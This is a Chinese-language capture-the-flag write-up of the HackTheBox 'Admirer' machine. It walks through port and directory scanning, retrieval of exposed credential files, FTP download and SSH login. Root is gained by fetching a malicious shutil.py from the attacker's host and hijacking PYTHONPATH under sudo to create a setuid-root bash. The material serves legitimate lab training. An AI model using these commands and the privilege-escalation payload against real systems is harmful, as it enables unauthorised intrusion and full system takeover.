Admirer-htb-writeup

0x00 靶场技能介绍

章节技能:目录扫描、ftp文件、mysql本地远程登录、Python依赖库提权

参考链接:https://0xdf.gitlab.io/2020/09/26/htb-admirer.html

参考链接:https://0xgeorge.github.io/2020/06/12/HTB-Admirer.html

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.187

2、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p- --min-rate=10000  10.10.10.187
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-17 09:29 CST
Warning: 10.10.10.187 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.187
Host is up (0.29s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
| ssh-hostkey: 
|   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
|   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
|_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-robots.txt: 1 disallowed entry 
|_/admin-dir
|_http-title: Admirer
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.64 seconds

3、获取下robots.txt文件信息

1
2
3
4
5
6
┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.187/robots.txt      
User-agent: *

# This folder contains personal contacts and creds, so no one -not even robots- should see it - waldo
Disallow: /admin-dir

4、目录遍历下 /admin-dir 下文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
┌──(kali㉿kali)-[~/桌面]
└─$ gobuster dir -u http://10.10.10.187/admin-dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,zip,html -t 20 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.187/admin-dir
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,zip,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 277]
/.php                 (Status: 403) [Size: 277]
/contacts.txt         (Status: 200) [Size: 350]


┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.187/admin-dir
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.187/_admin-dir_23-12-17_09-33-16.txt

Target: http://10.10.10.187/

[09:33:16] Starting: admin-dir/
[09:35:43] 200 -  135B  - /admin-dir/credentials.txt

5、查看获取的两处文件信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.187/admin-dir/contacts.txt 
##########
# admins #
##########
# Penny
Email: p.wise@admirer.htb


##############
# developers #
##############
# Rajesh
Email: r.nayyar@admirer.htb

# Amy
Email: a.bialik@admirer.htb

# Leonard
Email: l.galecki@admirer.htb



#############
# designers #
#############
# Howard
Email: h.helberg@admirer.htb

# Bernadette
Email: b.rauch@admirer.htb

┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.187/admin-dir/credentials.txt
[Internal mail account]
w.cooper@admirer.htb
fgJr6q#S\W:$P

[FTP account]
ftpuser
%n?4Wz}R$tTF7

[Wordpress account]
admin
w0rdpr3ss01!

6、使用其中ftp的账号密码,去获取下ftp下的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
┌──(kali㉿kali)-[~/桌面]
└─$ wget --user ftpuser --password '%n?4Wz}R$tTF7' -m ftp://10.10.10.187
--2023-12-17 09:38:59--  ftp://10.10.10.187/
           => “10.10.10.187/.listing”
正在连接 10.10.10.187:21... 已连接。
正在以 ftpuser 登录 ... 登录成功!
==> SYST ... 完成。   ==> PWD ... 完成。
==> TYPE I ... 完成。 ==> 不需要 CWD。
==> PASV ... 完成。   ==> LIST ... 完成。

10.10.10.187/.listing      [ <=>                      ]     254  --.-KB/s  用时 0s      

2023-12-17 09:39:04 (12.6 MB/s) - “10.10.10.187/.listing” 已保存 [254]

--2023-12-17 09:39:04--  ftp://10.10.10.187/dump.sql
           => “10.10.10.187/dump.sql”
==> 不需要 CWD。
==> PASV ... 完成。   ==> RETR dump.sql ... 完成。
长度:3405 (3.3K)

10.10.10.187/dump.sql  100%[=========================>]   3.33K  --.-KB/s  用时 0.001s  

2023-12-17 09:39:06 (2.89 MB/s) - “10.10.10.187/dump.sql” 已保存 [3405]

--2023-12-17 09:39:06--  ftp://10.10.10.187/html.tar.gz
           => “10.10.10.187/html.tar.gz”
==> 不需要 CWD。
==> PASV ... 完成。   ==> RETR html.tar.gz ... 完成。
长度:5270987 (5.0M)

10.10.10.187/html.tar. 100%[=========================>]   5.03M   395KB/s  用时 38s     

2023-12-17 09:39:45 (136 KB/s) - “10.10.10.187/html.tar.gz” 已保存 [5270987]

下载完毕 --2023-12-17 09:39:45--
总用时:45s
下载了:3 个文件,38s (136 KB/s) 中的 5.0M

┌──(kali㉿kali)-[~/桌面]
└─$ cd 10.10.10.187 
           
┌──(kali㉿kali)-[~/桌面/10.10.10.187]
└─$ ls
dump.sql  html.tar.gz

┌──(kali㉿kali)-[~/桌面/10.10.10.187]
└─$ tar ztf html.tar.gz --exclude "*/*"
assets/
images/
index.php
robots.txt
utility-scripts/
w4ld0s_s3cr3t_d1r/

$servername = "localhost";
$username = "waldo";
$password = "]F7jLHw:*G>UPrTo}~A"d6b";
$dbname = "admirerdb";

$servername = "localhost";
$username = "waldo";
$password = "Wh3r3_1s_w4ld0?";

7、获取到两处的数据库密码信息,但是无法通过远程的方式获取到密码,只能本地架设mysql再使用远程连接的方式形式进行。

首先,我必须在本地计算机上启动MySQL 服务,以便能够利用此漏洞。这是通过以 root 身份运行此命令来实现的 →service mysql start 接下来通过执行 mysql 与服务交互。现在我们已经启动了服务,接下来的步骤是创建数据库、用户、表并允许远程连接。我使用以下命令来执行此操作。

8、这里我各种尝试都不太对,故直接略过了,后续有想法了,再学习下这个技术

9、上面获取到登录密码的方式过滤,无法登录本地数据库的原因是实时站点上的信用信息与 FTP 备份中的信用信息不同,正确密码应该为:

1
2
3
4
$servername = "localhost";
$username = "waldo";
$password = "&<h5b~yK3F#{PaPB&dA}{H>";
$dbname = "admirerdb";

10、尝试登录,并获取到第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
┌──(kali㉿kali)-[~/桌面]
└─$ ssh waldo@10.10.10.187
The authenticity of host '10.10.10.187 (10.10.10.187)' can't be established.
ED25519 key fingerprint is SHA256:MfZJmYPldPPosZMdqhpjGPkT2fGNUn2vrEielbbFz/I.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.187' (ED25519) to the list of known hosts.
waldo@10.10.10.187's password: 
Linux admirer 4.9.0-19-amd64 x86_64 GNU/Linux

The programs included with the Devuan GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Thu Aug 24 16:09:42 2023 from 10.10.14.23
waldo@admirer:~$ 
waldo@admirer:~$ 
waldo@admirer:~$ ls
user.txt
waldo@admirer:~$ cat user.txt
73f96891057715f28eb49be3d85e3a10
waldo@admirer:~$

0x02 系统权限获取

11、这里涉及到一个比较复杂的利用环境,我直接列一下能成功的代码吧

1
2
3
4
5
6
7
8
#!/usr/bin/python3

import os

def make_archive(a,b,c):
    pass

os.system('cp /bin/bash /var/tmp/.shiyan; chown root:root /var/tmp/.shiyan; chmod 4755 /var/tmp/.shiyan')

12、开始利用,并获取到最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
waldo@admirer:/tmp$ cd /var/tmp
waldo@admirer:/var/tmp$ ls
waldo@admirer:/var/tmp$ wget 10.10.14.10:8000/shutil1.py -O shutil.py
--2023-12-17 02:23:12--  http://10.10.14.10:8000/shutil1.py
Connecting to 10.10.14.10:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 172 [text/x-python]
Saving to: ‘shutil.py’

shutil.py              100%[=========================>]     172  --.-KB/s    in 0s      

2023-12-17 02:23:13 (33.1 MB/s) - ‘shutil.py’ saved [172/172]

waldo@admirer:/var/tmp$ sudo PYTHONPATH=/var/tmp /opt/scripts/admin_tasks.sh 6
Running backup script in the background, it might take a while...
waldo@admirer:/var/tmp$ ls -la
total 1088
drwxrwxrwt  2 root  root     4096 Dec 17 02:23 .
drwxr-xr-x 12 root  root     4096 Nov 29  2019 ..
-rwsr-xr-x  1 root  root  1099016 Dec 17 02:23 .shiyan
-rw-r--r--  1 waldo waldo     172 Dec 17 02:18 shutil.py
waldo@admirer:/var/tmp$ ./.shiyan -p
.shiyan-4.4# id
uid=1000(waldo) gid=1000(waldo) euid=0(root) groups=1000(waldo),1001(admins)
.shiyan-4.4# cat /root/root.txt
98e7452da4c895df4dc888e95455dbfb
.shiyan-4.4#

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/248

打靶记
#shooting-range
Admirer-htb-writeup
https://sh1yan.top/2023/12/17/Admirer-htb-writeup/
作者
shiyan
发布于
2023年12月17日
许可协议